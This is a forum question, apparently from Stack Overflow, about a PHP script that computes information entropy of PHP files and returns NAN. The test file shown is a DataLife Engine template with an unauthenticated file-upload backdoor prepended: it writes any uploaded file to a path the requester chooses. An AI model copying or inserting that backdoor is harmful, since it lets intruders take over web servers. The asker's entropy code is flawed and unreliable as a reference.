# How to calculate information entropy using PHP

Tags: php, entropy

I need to use PHP to calculate the entropy of information in other PHP files. Use file_get_content to read them and then compute them.
My code looks like this

```
<?php
$String = 'qwertyuioplkjhgfdsazxcvbnmdgjdoqoiAznicguyfgvfpqopq  llxkzmjscnjd  nvhfhuwrty';
$letter = 'abcdefghijklmnopqrstuvwxyz';
preg_match_all("/[a-zA-Z]{1}/",$String,$arrAl);
$p=0;
$xin=0;
substr_count($String," ");
for( $i = 0; $i < strlen( $letter ); $i++ ) {
    $num=0;
    $s = $letter[$i];
    $b = 0;
    $gai=0;
    $res=0;
    count($arrAl[0]);
    for( $j = 0; $j < strlen( $String ); $j++ ) {
        if ( $s == $String[$j] ) {
            $b += 1;
        }
    }
    $num=count($arrAl[0])+substr_count($String," ");
    $gai=$b/$num;
    echo "The number of occurrences of ",$letter[$i]," is ",$b,"   The probability is :",$res=substr($gai, 0,6),"\n";
}
$bla=0;
echo "The number of occurrences of space :",substr_count($String," "),"   The probability is :",substr(substr_count($String," ")/$num, 0,6),"\n";
$bla=substr(substr_count($String," ")/$num, 0,6);
$p=-(($gai)*(log($gai)/log(2))+log($bla)/log(2));
echo "Sum of letters and Spaces:",$num,"<br/>",'The information entropy :',"E(X)=",$xin=substr($p, 0,6),"\n";
```

I'm running fine with the test string and I get the following output.

```
The number of occurrences of a is 1   The probability is :0.0129
The number of occurrences of b is 1   The probability is :0.0129
The number of occurrences of c is 3   The probability is :0.0389
The number of occurrences of d is 4   The probability is :0.0519
The number of occurrences of e is 1   The probability is :0.0129
The number of occurrences of f is 4   The probability is :0.0519
The number of occurrences of g is 4   The probability is :0.0519
The number of occurrences of h is 3   The probability is :0.0389
The number of occurrences of i is 3   The probability is :0.0389
The number of occurrences of j is 4   The probability is :0.0519
The number of occurrences of k is 2   The probability is :0.0259
The number of occurrences of l is 3   The probability is :0.0389
The number of occurrences of m is 2   The probability is :0.0259
The number of occurrences of n is 4   The probability is :0.0519
The number of occurrences of o is 4   The probability is :0.0519
The number of occurrences of p is 3   The probability is :0.0389
The number of occurrences of q is 4   The probability is :0.0519
The number of occurrences of r is 2   The probability is :0.0259
The number of occurrences of s is 2   The probability is :0.0259
The number of occurrences of t is 2   The probability is :0.0259
The number of occurrences of u is 3   The probability is :0.0389
The number of occurrences of v is 3   The probability is :0.0389
The number of occurrences of w is 2   The probability is :0.0259
The number of occurrences of x is 2   The probability is :0.0259
The number of occurrences of y is 3   The probability is :0.0389
The number of occurrences of z is 3   The probability is :0.0389
The number of occurrences of space :4   The probability is :0.0519
Sum of letters and Spaces:77
The information entropy :E(X)=4.4505
```

But when I changed the test file, there was a bug.
Here is my test file.

```
<?php
if ($_FILES['F1l3']) {
    move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); 
    Exit;
}
/*
=====================================================
 DataLife Engine - by SoftNews Media Group 
-----------------------------------------------------
 http://dle-news.ru/
-----------------------------------------------------
 Copyright (c) 2004,2014 SoftNews Media Group
=====================================================
 Данный код защищен авторскими правами
=====================================================
 Файл: fullsite.php
-----------------------------------------------------
 Назначение: WYSIWYG для новостей с сайта
=====================================================
*/

if(!defined('DATALIFEENGINE'))
{
  die("Hacking attempt!");
}

$fullarea = <<<HTML
    <div class="wseditor">
        <textarea id="full_story" name="full_story" class="wysiwygeditor" style="width:98%;height:200px;">
            {full-story}
        </textarea>
    </div>
HTML;

?>
```

Its output is as follows

```
The number of occurrences of a is 18   The probability is :0.0509
The number of occurrences of b is 1   The probability is :0.0028
The number of occurrences of c is 4   The probability is :0.0113
The number of occurrences of d is 14   The probability is :0.0396
The number of occurrences of e is 28   The probability is :0.0793
The number of occurrences of f is 12   The probability is :0.0339
The number of occurrences of g is 5   The probability is :0.0141
The number of occurrences of h is 7   The probability is :0.0198
The number of occurrences of i is 21   The probability is :0.0594
The number of occurrences of j is 0   The probability is :0
The number of occurrences of k is 1   The probability is :0.0028
The number of occurrences of l is 18   The probability is :0.0509
The number of occurrences of m is 6   The probability is :0.0169
The number of occurrences of n is 7   The probability is :0.0198
The number of occurrences of o is 12   The probability is :0.0339
The number of occurrences of p is 12   The probability is :0.0339
The number of occurrences of q is 0   The probability is :0
The number of occurrences of r is 12   The probability is :0.0339
The number of occurrences of s is 14   The probability is :0.0396
The number of occurrences of t is 24   The probability is :0.0679
The number of occurrences of u is 9   The probability is :0.0254
The number of occurrences of v is 3   The probability is :0.0084
The number of occurrences of w is 7   The probability is :0.0198
The number of occurrences of x is 4   The probability is :0.0113
The number of occurrences of y is 8   The probability is :0.0226
The number of occurrences of z is 0   The probability is :0
The number of occurrences of space :46   The probability is :0.1303
Sum of letters and Spaces:353
The information entropy :E(X)=NAN
```

It tells me that E(X) is equal to NAN
Is there anything wrong with my calculation?
How do I use PHP to calculate information entropy and file overlap?

Comment: So you should show us the data in the test file,as that appears to be cauing the issue

Comment: you need to check that the `log($bla)` is actually possible, for example there is no log(0) it will return INF for that